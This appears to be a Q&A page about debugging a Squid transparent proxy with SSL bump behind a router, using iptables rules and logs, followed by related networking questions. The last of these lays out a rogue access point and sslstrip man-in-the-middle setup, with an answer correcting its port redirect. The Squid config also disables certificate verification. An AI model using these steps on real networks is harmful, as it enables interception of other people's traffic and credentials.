squid transparent proxy (intercept) + router - proxy
there is already a configured transparent proxy squid-3.5.27, there is an EdgeOSEdgeRouter router
I want to make a circuit
all computers on the network -> router -> squid
squid - 109.0.0.110
router - 109.0.0.1
test Windows - 109.0.0.8
configuration squid.conf, version - squid-3.5.27
# You should use the same dns resolver on squid and all clients
dns_nameservers 127.0.0.1
# acls
acl localnet src 109.0.0.0/24 # RFC1918 possible internal network
acl localnet src 192.168.1.0/24 # RFC1918 possible internal network
acl localnet src 192.168.10.0/24 # RFC1918 possible internal network
acl SSL_ports port 443
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 # https
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl CONNECT method CONNECT
acl blocked_http dstdomain "/etc/squid/blocked_sites.txt"
# http access
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow localhost manager
http_access deny manager
http_access deny blocked_http
http_access allow localnet
http_access allow localhost
http_access deny all
http_port 3128 intercept
https_port 3129 intercept ssl-bump connection-auth=off cert=/etc/squid/squidCA.pem
http_port 3130
always_direct allow all
sslproxy_cert_error allow all
sslproxy_flags DONT_VERIFY_PEER
acl blocked ssl::server_name "/etc/squid/blocked_https.txt"
acl whitelist src "/etc/squid/whitelist_ip.txt"
ssl_bump splice whitelist
acl step1 at_step SslBump1
ssl_bump peek step1
ssl_bump terminate blocked
ssl_bump splice all
sslcrtd_program /opt/source/squid-3.5.27/src/ssl/ssl_crtd -s /var/lib/ssl_db -M 4MB
sslcrtd_children 8 startup=1 idle=1
acl YOUTUBE ssl::server_name .googlevideo.com
delay_pools 1
delay_class 1 2
delay_parameters 1 -1/-1 5120/5120
delay_access 1 allow YOUTUBE
coredump_dir /var/spool/squid
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern -i (/cgi-bin/|\?) 0 0% 0
refresh_pattern . 0 20% 4320
cache_dir aufs /var/spool/squid 20000 49 256
maximum_object_size 61440 KB
minimum_object_size 3 KB
cache_swap_low 90
cache_swap_high 95
maximum_object_size_in_memory 512 KB
memory_replacement_policy lru
logfile_rotate 4
try this doc
iptables -t nat -A PREROUTING -i eth0 ! -s 109.0.0.110 -p tcp --dport 80 -j DNAT --to 109.0.0.110:3128
iptables -t nat -A POSTROUTING -o eth0 -s 109.0.0.8/32 -d 109.0.0.110/32 -j SNAT --to 109.0.0.1
iptables -A FORWARD -s 109.0.0.8/32 -d 109.0.0.110/32 -i eth0 -o eth0 -p tcp --dport 3128 -j ACCEPT
prescribed iptables
I try to open a site on a test Windows (109.0.0.8) - access is denied, on Windows the gateway is 109.0.0.1, in the logs on squid
1546203601.533 0 109.0.0.110 TCP_MISS/403 4857 GET http://myip.ru/ - HIER_NONE/- text/html
1546203601.533 1 109.0.0.1 TCP_MISS/403 4977 GET http://myip.ru/ - ORIGINAL_DST/109.0.0.110 text/html
tcpdump squid server
11:00:57.141246 IP 109.0.0.8.54026 > myip.ru.http: Flags [F.], seq 1, ack 1, win 2087, length 0
11:00:57.141570 IP 109.0.0.8.54030 > myip.ru.http: Flags [S], seq 1736419147, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:00:57.141971 IP myip.ru.http > 109.0.0.8.54026: Flags [.], ack 2, win 58, length 0
11:00:57.142115 IP myip.ru.http > 109.0.0.8.54026: Flags [F.], seq 1, ack 2, win 58, length 0
11:00:57.142304 IP myip.ru.http > 109.0.0.8.54030: Flags [S.], seq 4065681746, ack 1736419148, win 29200, options [mss 1452,nop,nop,sackOK,nop,wscale 9], length 0
11:00:57.142363 IP 109.0.0.8.54026 > myip.ru.http: Flags [.], ack 2, win 2087, length 0
11:00:57.142505 IP 109.0.0.8.54030 > myip.ru.http: Flags [.], ack 1, win 260, length 0
11:00:57.144743 IP 109.0.0.8.54025 > myip.ru.http: Flags [P.], seq 2136:2856, ack 23054, win 2087, length 720: HTTP: GET / HTTP/1.1
11:00:57.146027 IP myip.ru.http > 109.0.0.8.54025: Flags [P.], seq 23054:23572, ack 2856, win 69, length 518: HTTP: HTTP/1.1 403 Forbidden
tell me what could be the problem, I will be grateful for any help?
Update
when you open a site on http by Windows, it is issued - 403, by https - an invalid certificate, the proxy server certificate is substituted in the browser, what am I doing wrong?
Update 2
when adding rules on a router
iptables -t nat -I PREROUTING -i eth0 -s 109.0.0.8 -p tcp --dport 80 -j DNAT --to 109.0.0.110:3128
iptables -t nat -I PREROUTING -i eth0 -s 109.0.0.8 -p tcp --dport 443 -j DNAT --to 109.0.0.110:3129
iptables -t nat -I POSTROUTING -o eth0 -s 109.0.0.8 -d 109.0.0.110 -j SNAT --to 109.0.0.1
proxy server rules
*nat
:PREROUTING ACCEPT [314:20555]
:INPUT ACCEPT [313:20511]
:OUTPUT ACCEPT [844:60999]
:POSTROUTING ACCEPT [2:130]
-A PREROUTING -s 109.0.0.0/24 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 3129
-A PREROUTING -s 109.0.0.0/24 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 3128
-A PREROUTING -s 192.168.10.0/24 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 3129
-A PREROUTING -s 192.168.10.0/24 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 3128
-A PREROUTING -s 192.168.1.0/24 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 3129
-A PREROUTING -s 192.168.1.0/24 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 3128
-A POSTROUTING -s 109.0.0.0/24 -j SNAT --to-source 109.0.0.110
-A POSTROUTING -s 192.168.10.0/24 -j SNAT --to-source 109.0.0.110
-A POSTROUTING -s 192.168.1.0/24 -j SNAT --to-source 109.0.0.110
COMMIT
*filter
:INPUT ACCEPT [340:18626]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [1809:273786]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -s 109.0.0.0/24 -j ACCEPT
-A INPUT -s 192.168.1.0/24 -j ACCEPT
-A INPUT -s 192.168.10.0/24 -j ACCEPT
-A INPUT -j LOG
-A INPUT -p tcp -m multiport --dports 3128:3130 -j DROP
-A FORWARD -s 109.0.0.0/24 -p udp -m multiport --dports 80,443 -j DROP
COMMIT
when you open a site on Windows on http, in cache.log
kid1| WARNING: Forwarding loop detected for:
GET / HTTP/1.1^M
Upgrade-Insecure-Requests: 1^M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36^M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8^M
Accept-Encoding: gzip, deflate^M
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7^M
Via: 1.1 proxy.server (squid/3.5.27)^M
X-Forwarded-For: 109.0.0.1^M
Cache-Control: max-age=259200^M
Connection: keep-alive^M
Host: myip.ru^M
^M
kid1| WARNING: Forwarding loop detected for:
GET /favicon.ico HTTP/1.1^M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36^M
Accept: image/webp,image/apng,image/*,*/*;q=0.8^M
Referer: http://myip.ru/^M
Accept-Encoding: gzip, deflate^M
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7^M
Via: 1.1 proxy.server (squid/3.5.27)^M
X-Forwarded-For: 109.0.0.1^M
Cache-Control: max-age=259200^M
Connection: keep-alive^M
Host: myip.ru^M
in access.log
1546711344.892 0 109.0.0.110 TCP_MISS/403 4514 GET http://myip.ru/ - HIER_NONE/- text/html
1546711344.893 0 109.0.0.1 TCP_MISS/403 4634 GET http://myip.ru/ - ORIGINAL_DST/109.0.0.110 text/html
1546711344.913 0 109.0.0.110 TCP_MISS/403 4479 GET http://myip.ru/favicon.ico - HIER_NONE/- text/html
1546711344.913 0 109.0.0.1 TCP_MISS/403 4599 GET http://myip.ru/favicon.ico - ORIGINAL_DST/109.0.0.110 text/html
WARNING: Forwarding loop detected for
how to fix it, any help ?
Don't use DNAT and change destination IP! Forward your traffic to the Squid machine as it was generated on the client machine by changing the IP routing table. See https://wiki.squid-cache.org/ConfigExamples/Intercept/IptablesPolicyRoute
I had the same problem which has been solved by this approach.
Related
redirection from port 443 to 8443 not working from external for standalone tomcat
I have a ec2 instance with centos and a tomcat server running on it on port 8080. My security group has an open port for HTTPS (443) For the redirection I've added the following iptables rules: iptables -A INPUT -i eth0 -p tcp --dport 443 -j ACCEPT iptables -A INPUT -i eth0 -p tcp --dport 8443 -j ACCEPT sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-ports 8443 sudo iptables -t nat -A OUTPUT -p tcp --dport 443 -j REDIRECT --to-ports 8443 Now i can connect from my instance to port 443 and get redirected to port 8443. https://localhost https://54.247.86.18 (elastic ip) But from external this doesn't work. If I connect to https://54.247.86.18 from browser I get an no server found error. Any ideas how to resolve it?
How to run ElasticSearch on port 80?
How can I run ElasticSearch on port 80? I modified the elasticsearch.yml file to point to port 80, but it doesn't seem to work. I am however able to run it on other ports like 8000, but when we are pointing to port 80 it doesn't seem to work. http.port: 8000 (This works) http.port: 80 (Doesn't seem to work)
In order to change port 80 you need root privileges (as of with all the ports underneath 1024) You can forward the connection as follow iptables -A INPUT -i eth0 -p tcp --dport 80 -j ACCEPT iptables -A INPUT -i eth0 -p tcp --dport 8060 -j ACCEPT iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8060 Source: source
Optimizing firewall rules processing
I'm using fail2ban to block failed login attempts on my server. The block is performed using IP tables with the following configuration: actionstart = iptables -N fail2ban iptables -A fail2ban -j RETURN iptables -I <chain> -p tcp -m multiport --dports <port> -j fail2ban actionstop = iptables -D <chain> -p tcp -m multiport --dports <port> -j fail2ban iptables -F fail2ban iptables -X fail2ban actionban = iptables -I fail2ban 1 -s <ip> -j DROP actionunban = iptables -D fail2ban -s <ip> -j DROP What I'm concerned about is rules processing performance. The above rules are in stateful mode and I've been wondering if stateless mode would make the processing faster. To make things clear, I'm blocking the intruder IP address on a TCP port (e.g., 22 or 25). I read somewhere that for TCP connection specialy, adding the ESTABLISHED,RELATED states would be better. But since each IP refers to a different connection, does it make sense to apply these states? UPDATE: Here is a sample iptables -L: Chain INPUT (policy ACCEPT 399 packets, 36043 bytes) pkts bytes target prot opt in out source destination 39 4230 fail2ban tcp -- * * 0.0.0.0/0 0.0.0.0/0 multiport dports 22,25,80,99,100,101 Chain FORWARD (policy ACCEPT 0 packets, 0 bytes) pkts bytes target prot opt in out source destination Chain OUTPUT (policy ACCEPT 282 packets, 39686 bytes) pkts bytes target prot opt in out source destination Chain fail2ban (1 references) pkts bytes target prot opt in out source destination 0 0 DROP all -- * * 192.168.0.1 0.0.0.0/0 0 0 DROP all -- * * 192.168.0.2 0.0.0.0/0 0 0 DROP all -- * * 192.168.0.3 0.0.0.0/0 0 0 DROP all -- * * 192.168.0.4 0.0.0.0/0 39 4230 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
Despite what many performance apologists claim, IPtables CAN have significant overhead, but it won't be noticeable until you get some substantial traffic. Now how you do the tables, and which extensions you call, will be determining factor on CPU overhead per packet. As for stateless vs statefull, yes the performance difference can be immense, but again it's at a very high throughput. In addition as you may have read, it is much more complexity to manage a stateless firewall. It should really only be done if the IPtable impact is measurable. BUT good practice should always be followed, and IMO that includes the least amount of overhead without adding lots of complexity. Now as for your situation, fail2ban is only considering a segment of your iptables overall, but the only thing that I would recommend looking at preventively is this part. -p tcp -m multiport --dports Using the multiport extension does have more overhead, except when doing so would make a solid reduction of rules. Since you are only doing 2, I would list them separately, to avoid the multiport extension... or better yet just one by range, if you don't care about blocking 23 and 24. -p tcp -m tcp --dport 22:25 As for established tracking, yes you can use it with fail2ban, although it does have some considerations. To get the most impact, you'd want to place fail2ban chain below ESTABLISHED,RELATED. However this will allow already established connections, considering you'd need an already authenticated user, it seems reasonable enough. This is a mini example of the tables I use for my servers, with some example rules, I commented it for you, *raw :PREROUTING ACCEPT [0:0] :OUTPUT ACCEPT [0:0] ## Stateless on Loopback ## Remove everything before #filter if iptables chokes on #raw -A OUTPUT -o lo -j NOTRACK COMMIT *filter ## Default Chains :INPUT ACCEPT [0:0] :FORWARD DROP [0:0] :OUTPUT ACCEPT [0:0] ## Proto Chains :FWINPUT-TCP - [0:0] :FWINPUT-UDP - [0:0] :FWINPUT-ICMP - [0:0] ## FAIL2BAN Chain :fail2ban - [0:0] ## Accept Established -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT ## Accept Loopback -A INPUT -i lo -j ACCEPT ## Seperate Proto -A INPUT -p tcp -g FWINPUT-TCP -A INPUT -p udp -g FWINPUT-UDP -A INPUT -p icmp -g FWINPUT-ICMP ## Reject Anything Non-TCP/UDP/ICMP -A INPUT -j REJECT --reject-with icmp-proto-unreachable ## TCP Rules -A FWINPUT-TCP -p tcp -m tcp --dport 80 -j ACCEPT -A FWINPUT-TCP -p tcp -m tcp --dport 443 -j ACCEPT ## fail2ban Check -A FWINPUT-TCP -p tcp -m tcp --dport 22:25 -g fail2ban ## fail2ban Return -A FWINPUT-TCP -p tcp -m tcp --dport 22 -j ACCEPT -A FWINPUT-TCP -p tcp -m tcp --dport 25 -j ACCEPT ## TCP-Reset Ident -A FWINPUT-TCP -p tcp -m tcp --dport 113 -j REJECT --reject-with tcp-reset ## Reject Any Other TCP Traffic -A FWINPUT-TCP -j REJECT --reject-with icmp-port-unreachable ## UDP Rules -A FWINPUT-UDP -p udp --dport 5353 -d 224.0.0.251 -j ACCEPT ## Reject Any Other UDP Traffic -A FWINPUT-UDP -j REJECT --reject-with icmp-port-unreachable ## ICMP Rules -A FWINPUT-ICMP -p icmp -m icmp --icmp-type 8 -m limit --limit 5/s -j ACCEPT -A FWINPUT-ICMP -p icmp -m icmp --icmp-type 3 -j ACCEPT -A FWINPUT-ICMP -p icmp -m icmp --icmp-type 4 -j ACCEPT -A FWINPUT-ICMP -p icmp -m icmp --icmp-type 11 -j ACCEPT -A FWINPUT-ICMP -p icmp -m icmp --icmp-type 12 -j ACCEPT ## Reject Any Other ICMP Types -A FWINPUT-ICMP -j REJECT --reject-with icmp-host-prohibited ## fail2ban Inserted Rules -A fail2ban -j RETURN COMMIT I would just blank out the action start and action stop, and let fail2ban just add the blocked IP rules when running. This would a pinch more manual considerations, like if you wanted to start using fail2ban to block more stuff... but if it's a set type of thing your trying to work on, then it shouldn't be a problem. ... On my home system, and not on servers, I usually just set an iptables limit and call it good enough.
Can't ping my MFP from Windows, but can by Linux
I have a trouble. Can`t access to my ethernet-connected MFP from Windows 7 clients, but by Ubuntu (and router/server) machine it can get access to it. MFP = Epson Stylus Color 730 network: MFP (192.168.0.100) + win7clients (192.168.0.101-200) ---> Ubuntu server/router (192.168.0.1) ---> Internet MFP get right IP and settings form DHCP server. On Windows machines disabled all firewalls and so on. From Ubuntu I can do with MFP what I want, but why I can`t even ping it form Windows? Thanks Edit: Content of /etc/sysctl.conf : # # /etc/sysctl.conf - Configuration file for setting system variables # See /etc/sysctl.d/ for additional system variables # See sysctl.conf (5) for information. # #kernel.domainname = example.com # Uncomment the following to stop low-level messages on console #kernel.printk = 3 4 1 3 ##############################################################3 # Functions previously found in netbase # # Uncomment the next two lines to enable Spoof protection (reverse-path filter) # Turn on Source Address Verification in all interfaces to # prevent some spoofing attacks #net.ipv4.conf.default.rp_filter=1 #net.ipv4.conf.all.rp_filter=1 # Uncomment the next line to enable TCP/IP SYN cookies # See http://lwn.net/Articles/277146/ # Note: This may impact IPv6 TCP sessions too #net.ipv4.tcp_syncookies=1 # Uncomment the next line to enable packet forwarding for IPv4 net.ipv4.ip_forward=1 # Uncomment the next line to enable packet forwarding for IPv6 # Enabling this option disables Stateless Address Autoconfiguration # based on Router Advertisements for this host #net.ipv6.conf.all.forwarding=1 ################################################################### # Additional settings - these settings can improve the network # security of the host and prevent against some network attacks # including spoofing attacks and man in the middle attacks through # redirection. Some network environments, however, require that these # settings are disabled so review and enable them as needed. # # Do not accept ICMP redirects (prevent MITM attacks) #net.ipv4.conf.all.accept_redirects = 0 #net.ipv6.conf.all.accept_redirects = 0 # _or_ # Accept ICMP redirects only for gateways listed in our default # gateway list (enabled by default) # net.ipv4.conf.all.secure_redirects = 1 # # Do not send ICMP redirects (we are not a router) #net.ipv4.conf.all.send_redirects = 0 # # Do not accept IP source route packets (we are not a router) #net.ipv4.conf.all.accept_source_route = 0 #net.ipv6.conf.all.accept_source_route = 0 # # Log Martian Packets #net.ipv4.conf.all.log_martians = 1 # Edit 2: After some fixes - all, except of me in local net can use MFP. So, new puzzle: My local network: http://prntscr.com/kvk5g "Hakuhonoo" can`t see MFP, but other do. Content of /etc/iptables.conf: # Generated by iptables-save v1.4.12 on Fri Nov 9 01:51:58 2012 *filter :INPUT ACCEPT [23:1420] :FORWARD DROP [0:0] :OUTPUT ACCEPT [20:18904] -A INPUT -i lo -j ACCEPT -A INPUT -i eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT -A INPUT -d 224.0.0.0/4 -i eth0 -j ACCEPT -A INPUT -s 224.0.0.0/4 -i eth0 -j ACCEPT -A INPUT -i eth0 -p tcp -m tcp --dport 80:85 -j ACCEPT -A INPUT -i eth0 -p tcp -m tcp --dport 1985 -j ACCEPT -A INPUT -i eth0 -p tcp -m tcp --dport 25565 -j ACCEPT -A INPUT -i eth0 -p tcp -m state --state NEW -m tcp --dport 60000:65000 -j ACCEPT -A INPUT -i eth0 -j DROP -A FORWARD -i eth0 -o br0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT -A FORWARD -i br0 -o eth0 -j ACCEPT -A FORWARD -d 224.0.0.0/4 -j ACCEPT -A FORWARD -s 224.0.0.0/4 -j ACCEPT -A FORWARD -i eth0 -p tcp --dport 81:85 -j ACCEPT -A FORWARD -i eth0 -j DROP COMMIT # Completed on Fri Nov 9 01:51:58 2012 # Generated by iptables-save v1.4.12 on Fri Nov 9 01:51:58 2012 *nat :PREROUTING ACCEPT [377:31747] :INPUT ACCEPT [39:3558] :OUTPUT ACCEPT [11:872] :POSTROUTING ACCEPT [7:570] -A PREROUTING -i eth0 -p tcp --dport 81:85 -j DNAT --to 192.168.0.101 -A POSTROUTING -o eth0 -j MASQUERADE COMMIT # Completed on Fri Nov 9 01:51:58 2012 # Generated by iptables-save v1.4.12 on Fri Nov 9 01:51:58 2012 *mangle :PREROUTING ACCEPT [1425:140833] :INPUT ACCEPT [762:69219] :FORWARD ACCEPT [495:56655] :OUTPUT ACCEPT [643:122295] :POSTROUTING ACCEPT [1152:179096] -A PREROUTING -d 224.0.0.0/4 -p udp -j TTL --ttl-inc 1 COMMIT # Completed on Fri Nov 9 01:51:58 2012
Did you set your Ubuntu to forward packets? Enable routing: (taken from here) Configure the gateway for routing between two interfaces by enabling IP forwarding: sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward" Edit /etc/sysctl.conf, and (up to 10.04) add these lines: net.ipv4.conf.default.forwarding=1 net.ipv4.conf.all.forwarding=1 From 10.10 onwards, it suffices to edit /etc/sysctl.conf and uncomment: net.ipv4.ip_forward=1
SSLStrip not working for me
I am having trouble with SSLStrip in a MITM Setup with Backtrack 5. I am using an external wireless card to broadcast the wireless signal, and routing through an Ethernet. I am successfully viewing the packets in Wireshark, however I would like to view SSL data using SSLStrip. These are the preliminary commands I use to set up MITM. airmon-ng start wlan1 airbase-ng --essid mitm 11 mon0 --new Terminal-- brctl addbr mitm-bridge brctl addif mitm-bridge eth0 brctl addif mitm-bridge at0 ifconfig eth0 0.0.0.0 up ifconfig at0 0.0.0.0 up ifconfig mitm-bridge 192.168.0.199 up echo 1 > /proc/sys/net/ipv4/ip_forward At this point, I can view packet data in WireShark. I follow these steps to set up SSLStrip iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666 cd /pentest/web/sslstrip sslstrip -l 8080 When I am finished with the session and I open sslstrip.log I do not see any data written to the file. Also, I am unable to access the internet once I do the iptables redirect. Please let me know what you think the problem might be.
Assuming sslstrip and arp poisoning are up and running you have a problem with port redirection. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666 redirects http traffic to 127.0.0.1 port 666. cd /pentest/web/sslstrip sslstrip -l 8080 starts sslstrip listening for incoming traffic on port 8080 U can either change port redirection to 8080 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 or change the listening port to 666 sslstrip -l 666